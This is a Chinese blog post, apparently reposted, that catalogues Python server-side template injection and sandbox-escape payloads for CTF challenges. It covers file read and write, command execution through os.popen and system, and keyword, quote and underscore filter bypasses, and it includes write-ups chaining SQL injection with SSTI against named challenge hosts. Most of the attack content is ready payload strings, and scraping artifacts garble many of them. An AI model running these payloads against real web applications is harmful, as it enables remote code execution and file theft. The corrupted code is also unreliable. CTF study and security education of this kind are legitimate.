php沙盒绕过ctf,浅析SSTI(python沙盒绕过)

客官°小女子只卖身不卖艺 2023-01-18 11:20 46阅读 0赞

在CTF比赛中见过不少的SSTI题目，在这里整理下思路，记录下

0x01 简介

SSTI(Server-Side Template Injection)，即服务端模板注入攻击，通过与服务端模板的输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者getshell的目的，目前CTF常见的SSTI题中，大部分是考python的

0x02 攻击流程

攻击流程，以文件读取为例子

函数解析

\_\_class\_\_ 返回调用的参数类型

\_\_bases\_\_ 返回类型列表

\_\_mro\_\_ 此属性是在方法解析期间寻找基类时考虑的类元组

\_\_subclasses\_\_() 返回object的子类

\_\_globals\_\_ 函数会以字典类型返回当前位置的全部全局变量 与 func\_globals 等价

获取基本类

''.\_\_class\_\_.\_\_mro\_\_\[zxsq-anti-bbcode-2\]

\{\}.\_\_class\_\_.\_\_bases\_\_\[zxsq-anti-bbcode-0\]

().\_\_class\_\_.\_\_bases\_\_\[zxsq-anti-bbcode-0\]

\[zxsq-anti-bbcode-\].\_\_class\_\_.\_\_bases\_\_\[0\]

request.\_\_class\_\_.\_\_mro\_\_\[zxsq-anti-bbcode-8\] //针对jinjia2/flask为\[zxsq-anti-bbcode-9\]适用

获取基本类后，继续向下获取基本类(object)的子类

object.\_\_subclasses\_\_()

找到重载过的\_\_init\_\_类(在获取初始化属性后，带wrapper的说明没有重载，寻找不带warpper的)

>>> ''.\_\_class\_\_.\_\_mro\_\_\[zxsq-anti-bbcode-2\].\_\_subclasses\_\_()\[zxsq-anti-bbcode-99\].\_\_init\_\_

>>> ''.\_\_class\_\_.\_\_mro\_\_\[zxsq-anti-bbcode-2\].\_\_subclasses\_\_()\[zxsq-anti-bbcode-59\].\_\_init\_\_

查看其引用\_\_builtins\_\_

builtins即是引用，Python程序一旦启动，它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入，它在任何模块都直接可见，所以这里直接调用引用的模块

''.\_\_class\_\_.\_\_mro\_\_\[zxsq-anti-bbcode-2\].\_\_subclasses\_\_()\[zxsq-anti-bbcode-59\].\_\_init\_\_.\_\_globals\_\_\[zxsq-anti-bbcode-'\_\_builtins\_\_'\]

这里会返回dict类型，寻找keys中可用函数，直接调用即可，使用keys中的file以实现读取文件的功能

''.\_\_class\_\_.\_\_mro\_\_\[zxsq-anti-bbcode-2\].\_\_subclasses\_\_()\[zxsq-anti-bbcode-59\].\_\_init\_\_.\_\_globals\_\_\[zxsq-anti-bbcode-'\_\_builtins\_\_'\]\[zxsq-anti-bbcode-'file'\]('F://GetFlag.txt').read()

除此外还有其他的调用方式

0x03 读写文件

上面的方法读文件

方法1

存在的子模块可以通过.index()来进行查询，如果存在的话返回索引，直接调用即可

方法2

>>> ''.\_\_class\_\_.\_\_mro\_\_\[zxsq-anti-bbcode-2\].\_\_subclasses\_\_().index(file)

\[zxsq-anti-bbcode-\].\_\_class\_\_.\_\_base\_\_.\_\_subclasses\_\_()\[40\]('/etc/passwd').read() \#将read() 修改为 write() 即为写文件

0x04 命令执行

方法1 利用eval 进行命令执行

方法2 利用warnings.catch\_warnings 进行命令执行

查看warnings.catch\_warnings方法的位置

>>> \[\].\_\_class\_\_.\_\_base\_\_.\_\_subclasses\_\_().index(warnings.catch\_warnings)

查看linecatch的位置

>>> \[zxsq-anti-bbcode-\].\_\_class\_\_.\_\_base\_\_.\_\_subclasses\_\_()\[59\].\_\_init\_\_.\_\_globals\_\_.keys().index('linecache')

查找os模块的位置

>>> \[zxsq-anti-bbcode-\].\_\_class\_\_.\_\_base\_\_.\_\_subclasses\_\_()\[59\].\_\_init\_\_.\_\_globals\_\_\[zxsq-anti-bbcode-'linecache'\].\_\_dict\_\_.keys().index('os')

查找system方法的位置(在这里使用os.open().read()可以实现一样的效果,步骤一样,不再复述)

>>> \[zxsq-anti-bbcode-\].\_\_class\_\_.\_\_base\_\_.\_\_subclasses\_\_()\[59\].\_\_init\_\_.\_\_globals\_\_\[zxsq-anti-bbcode-'linecache'\].\_\_dict\_\_.values()\[zxsq-anti-bbcode-12\].\_\_dict\_\_.keys().index('system')

144

调用system方法

root

方法3 利用commands 进行命令执行

\{\}.\_\_class\_\_.\_\_bases\_\_\[zxsq-anti-bbcode-0\].\_\_subclasses\_\_()\[zxsq-anti-bbcode-59\].\_\_init\_\_.\_\_globals\_\_\[zxsq-anti-bbcode-'\_\_builtins\_\_'\]\[zxsq-anti-bbcode-'\_\_import\_\_'\]('commands').getstatusoutput('ls')

\{\}.\_\_class\_\_.\_\_bases\_\_\[zxsq-anti-bbcode-0\].\_\_subclasses\_\_()\[zxsq-anti-bbcode-59\].\_\_init\_\_.\_\_globals\_\_.\_\_builtins\_\_.\_\_import\_\_('os').popen('id').read()

0x05 常见绕过方式

绕过中括号

pop() 函数用于移除列表中的一个元素(默认最后一个元素)，并且返回该元素的值。

>>> ''.\_\_class\_\_.\_\_mro\_\_.\_\_getitem\_\_(2).\_\_subclasses\_\_().pop(40)('/etc/passwd').read()

'root:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\\nsync:x:4:65534:sync:/bin:/bin/sync\\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\\nlp:x:7:7:lp:/var/sp

在这里使用pop并不会真的移除,但却能返回其值,取代中括号,来实现绕过

过滤引号

request.args 是flask中的一个属性,为返回请求的参数,这里把path当作变量名,将后面的路径传值进来,进而绕过了引号的过滤

\{ \{().\_\_class\_\_.\_\_bases\_\_.\_\_getitem\_\_(0).\_\_subclasses\_\_().pop(40)(request.args.path).read()\}\}&path=/etc/passwd

过滤双下划线

同样利用request.args属性

\{ \{ ''\[zxsq-anti-bbcode-request.args.class\]\[zxsq-anti-bbcode-request.args.mro\]\[zxsq-anti-bbcode-2\]\[zxsq-anti-bbcode-request.args.subclasses\]()\[zxsq-anti-bbcode-40\]('/etc/passwd').read() \}\}&class=\_\_class\_\_&mro=\_\_mro\_\_&subclasses=\_\_subclasses\_\_

将其中的request.args改为request.values则利用post的方式进行传参

GET:

\{ \{ ''\[zxsq-anti-bbcode-request.value.class\]\[zxsq-anti-bbcode-request.value.mro\]\[zxsq-anti-bbcode-2\]\[zxsq-anti-bbcode-request.value.subclasses\]()\[zxsq-anti-bbcode-40\]('/etc/passwd').read() \}\}

POST:

class=\_\_class\_\_&mro=\_\_mro\_\_&subclasses=\_\_subclasses\_\_

过滤关键字

base64编码绕过

\_\_getattribute\_\_使用实例访问属性时,调用该方法

例如被过滤掉\_\_class\_\_关键词

\{ \{\[zxsq-anti-bbcode-\].\_\_getattribute\_\_('X19jbGFzc19f'.decode('base64')).\_\_base\_\_.\_\_subclasses\_\_()\[40\]("/etc/passwd").read()\}\}

字符串拼接绕过

\{ \{\[zxsq-anti-bbcode-\].\_\_getattribute\_\_('\_\_c'+'lass\_\_').\_\_base\_\_.\_\_subclasses\_\_()\[40\]("/etc/passwd").read()\}\}

0x06 实战

科来杯-easy\_flask

这个题考察点在sqli + ssti

比赛中没做出来，但是复现成功后一想，应该算是ssti中比较简单的题，sql注入和ssti均未有任何过滤，但是用sql注入联合查询的返回结果来进行ssti注入攻击的模式是第一次见

刚开始添加用户和输入的数据

![7ecfc869a265fb015b3609991ee3f6ea.png][]

提交后，提示添加成功，然后在Search Comments中输入刚才的用户名，来提交查询，查询结果会出现在Show Comments中

在查询阶段存在注入

![963f35dc435e622cdeb3ae05c2ef4266.png][]

利用回显结果来进行ssti攻击

payload如下

http://47.105.148.65:29003/?username=GetFlag' union select 1,'\{ \{\[zxsq-anti-bbcode-\].\_\_class\_\_.\_\_base\_\_.\_\_subclasses\_\_()\[59\].\_\_init\_\_.func\_globals.linecache.os.popen("strings /flag").read()\}\}',3 --+

![c1569c161471b804e1e36d93ea601e7e.png][]

QCTF-Confustion1

查看题目界面

![c036020328ecf73b18902dcf6de8464e.png][]

测试发现404页面存在ssti

![305a3edf4d48a97d6f5ca71ff268481c.png][]

但是进行了一系列的黑名单,索性全部采用request.args传值的方式绕过

读取成功

![532943a6dc2443e98e0827c608e01107.png][]

右击查看源代码,发现flag存放位置

![4110696f3624b5ea02433f2c61a99ee2.png][]

读取flag文件

http://123.207.149.64:23361/\{ \{''\[zxsq-anti-bbcode-request.args.a\]\[zxsq-anti-bbcode-request.values.b\]\[zxsq-anti-bbcode-2\]\[zxsq-anti-bbcode-request.values.c\]()\[zxsq-anti-bbcode-40\]('/opt/flag\_1234qwerty.txt').read()\}\}?a=\_\_class\_\_&b=\_\_mro\_\_&c=\_\_subclasses\_\_

![08ed5626fffb12e5ff268f2c6d3dc016.png][]

[7ecfc869a265fb015b3609991ee3f6ea.png]: /images/20221021/1bb31d1dc151459db32e800952c8d4fd.png
[963f35dc435e622cdeb3ae05c2ef4266.png]: /images/20221021/d95d38289d094152ac96115ef8034366.png
[c1569c161471b804e1e36d93ea601e7e.png]: /images/20221021/00950365a8a54772958eaf463b12c2ae.png
[c036020328ecf73b18902dcf6de8464e.png]: /images/20221021/af28a423fb2c40f8a1ea870c255014c4.png
[305a3edf4d48a97d6f5ca71ff268481c.png]: /images/20221021/f9e0873a1bea41d299510f4a768a1cf9.png
[532943a6dc2443e98e0827c608e01107.png]: /images/20221021/e52919f97b14418aa0a6cc26ae99d704.png
[4110696f3624b5ea02433f2c61a99ee2.png]: /images/20221021/c25121556816486ebea59c1ee648d1b1.png
[08ed5626fffb12e5ff268f2c6d3dc016.png]: /images/20221021/e27ced051a544a34beb0a041098e1e52.png